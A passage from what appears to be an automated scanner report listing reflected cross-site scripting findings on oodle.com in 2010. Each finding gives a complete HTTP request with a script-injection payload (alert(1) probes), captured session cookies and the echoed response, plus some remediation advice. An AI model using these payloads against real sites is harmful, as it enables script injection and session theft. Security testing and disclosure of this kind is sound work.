Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMDMxO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 46444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?cc5be"><script>alert(1)</script>54f964f95d1=1" />
...[SNIP]...

1.164. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /browse/-/social_circle_all/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6127"-alert(1)-"a678d9503d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browsec6127"-alert(1)-"a678d9503d9/-/social_circle_all/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:34:30 GMT
Content-Length: 18649
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjcwO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
xtraFields = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds browsec6127"-alert(1)-"a678d9503d9/-/social_circle_all/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.165. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /browse/-/social_circle_all/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd8b"><script>alert(1)</script>962195aab20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse4bd8b"><script>alert(1)</script>962195aab20/-/social_circle_all/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:34:29 GMT
Content-Length: 18723
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjY5O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/browse4bd8b"><script>alert(1)</script>962195aab20/-/social_circle_all/" />
...[SNIP]...

1.166. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /browse/-/social_circle_all/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e368"><script>alert(1)</script>f8526cc3d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/9e368"><script>alert(1)</script>f8526cc3d79/social_circle_all/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:34:30 GMT
Content-Length: 23978
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjcwO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/browse/9e368"><script>alert(1)</script>f8526cc3d79/social_circle_all/" />
...[SNIP]...

1.167. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c56"-alert(1)-"ee7e3a7ae52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro80c56"-alert(1)-"ee7e3a7ae52/fb-follow/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:33 GMT
Content-Length: 18583
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjE0O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
lyExtraFields = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro80c56"-alert(1)-"ee7e3a7ae52/fb-follow/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.168. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a095"><script>alert(1)</script>9fb41edefe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro2a095"><script>alert(1)</script>9fb41edefe9/fb-follow/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:32 GMT
Content-Length: 18667
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEyO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro2a095"><script>alert(1)</script>9fb41edefe9/fb-follow/" />
...[SNIP]...

1.169. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5aa1d"-alert(1)-"f251f51b74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/fb-follow5aa1d"-alert(1)-"f251f51b74e/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:35 GMT
Content-Length: 12342
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjE1O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
lds = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro/fb-follow5aa1d"-alert(1)-"f251f51b74e/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.170. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c9aa"><script>alert(1)</script>f8d17b7843f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/fb-follow1c9aa"><script>alert(1)</script>f8d17b7843f/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:34 GMT
Content-Length: 12401
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEzO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/fb-follow1c9aa"><script>alert(1)</script>f8d17b7843f/" />
...[SNIP]...

1.171. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ed8e"-alert(1)-"545a0086820 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/fb-follow/?3ed8e"-alert(1)-"545a0086820=1 HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:32 GMT
Content-Length: 10025
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEyO30%3D; path=/; domain=.oodle.com

{"profile_html":"<div class=\"profile-polaroid\">\n\t<div class=\"profile-polaroid-pic\">\n\t\t\t<img src=\"http:\/\/i.oodleimg.com\/a\/account\/facebook_silhouette.gif\" width=\"50\" height=\"50\"\/>
...[SNIP]...
-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds pro/fb-follow/?3ed8e"-alert(1)-"545a0086820=1","10000000","","","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.172. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335f8"><script>alert(1)</script>b6b7ff9456b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/fb-follow/?335f8"><script>alert(1)</script>b6b7ff9456b=1 HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:26 GMT
Content-Length: 10105
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA2O30%3D; path=/; domain=.oodle.com

{"profile_html":"<div class=\"profile-polaroid\">\n\t<div class=\"profile-polaroid-pic\">\n\t\t\t<img src=\"http:\/\/i.oodleimg.com\/a\/account\/facebook_silhouette.gif\" width=\"50\" height=\"50\"\/>
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/fb-follow/?335f8"><script>alert(1)</script>b6b7ff9456b=1" />
...[SNIP]...

1.173. http://www.oodle.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4ae7"-alert(1)-"7616b8adb5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /prod4ae7"-alert(1)-"7616b8adb5d/register/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
